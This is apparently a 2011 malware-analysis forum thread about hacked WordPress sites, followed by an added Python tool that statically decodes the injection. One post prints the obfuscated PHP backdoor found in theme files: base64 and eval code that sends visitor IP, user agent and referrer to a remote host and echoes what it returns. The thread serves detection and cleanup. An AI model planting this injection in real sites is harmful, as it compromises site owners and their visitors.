Malware Domain List

Malware Related => Malware Analysis => Topic started by: foks on September 09, 2011, 06:50:40 am

Post by: foks on September 09, 2011, 06:50:40 am
On some sites I have seen a new JavaScript starting with <script id="googleblogcontainer">. You can see the entire script on

The script is encrypted and requests the file That script seems very innocent:
Code:
function remove(element) {
var parent = element.parentNode;
var my = document.getElementById('googleblogcounter');
my.src = '';
var my = document.getElementById('googleblogcontainer');
my.src = '';

I have not been able to find out what the script tries to do next. is not blacklisted in Google but is on the same network as and has also been used in the TimThumb attacks against WordPress sites.
Title: Re:
Post by: Mofaya on October 17, 2011, 06:40:09 pm
The WordPress hacking continues
In all my index files and WordPress theme files I have this  >:(
Code:
<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip $_SERVER['REMOTE_ADDR'];$host $_SERVER['HTTP_HOST'];$uri urlencode($_SERVER['REQUEST_URI']);$ref urlencode($_SERVER['HTTP_REFERER']);$url $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref$tmp file_get_contents($url); echo $tmp?>
Decoded to
Code:
<?php $url 'hxxp://'?>
Just google 'hxxp://' and see the infected site results  :-[
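
Added example, not part of the thread: a static decoder in Python for the wrapper posted above. The second base64 string in that snippet decodes to a stub that calls `strtr()` on `$_X` with two substitution tables; the code reads those tables from the stub and applies them itself, so nothing is passed to `eval`. `build_sample` and the 192.0.2.10 documentation address are constructed test input, not values from the thread.

```python
import base64
import re

PAYLOAD_RE = re.compile(r"\$_X\s*=\s*'([A-Za-z0-9+/=]+)'")
STUB_RE = re.compile(r"eval\(base64_decode\('([A-Za-z0-9+/=]+)'\)\)")
STRTR_RE = re.compile(r"strtr\(\$_X,'([^']*)','([^']*)'\)")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


def b64_text(blob):
    # latin-1 maps every byte to one character, so decoding never fails
    return base64.b64decode(blob).decode("latin-1")


def decode_injection(php_source):
    """Statically unwrap the injected snippet; no PHP is evaluated."""
    payload = PAYLOAD_RE.search(php_source)
    stub = STUB_RE.search(php_source)
    if not (payload and stub):
        return None
    stub_text = b64_text(stub.group(1))
    hidden = b64_text(payload.group(1))
    tables = STRTR_RE.search(stub_text)
    if tables:
        src, dst = tables.groups()
        n = min(len(src), len(dst))  # PHP strtr() ignores the longer tail
        hidden = hidden.translate(str.maketrans(src[:n], dst[:n]))
    return {"stub": stub_text, "hidden": hidden, "urls": URL_RE.findall(hidden)}


def defang(url):
    """Make a URL non-clickable for tickets and reports."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def build_sample(plain):
    """Constructed test input: wrap `plain` the way the posted snippet does."""
    src, dst = "123456aouie", "aouie123456"  # tables found in the posted stub
    stub = "$_X=base64_decode($_X);$_X=strtr($_X,'%s','%s');eval($_X);" % (src, dst)
    enc = plain.translate(str.maketrans(dst, src))  # inverse substitution
    wrap = lambda s: base64.b64encode(s.encode("latin-1")).decode("ascii")
    return "<?php $_X='%s';eval(base64_decode('%s'));?>" % (wrap(enc), wrap(stub))


if __name__ == "__main__":
    # 192.0.2.10 is a documentation address, not a value from the thread
    result = decode_injection(build_sample("?><?php $url = 'http://192.0.2.10/bt.php'; ?>"))
    print(result["stub"])
    print([defang(u) for u in result["urls"]])
```

Run over the files of an affected theme, the `urls` field gives the fetch target to block or search for in proxy logs without executing the injected code.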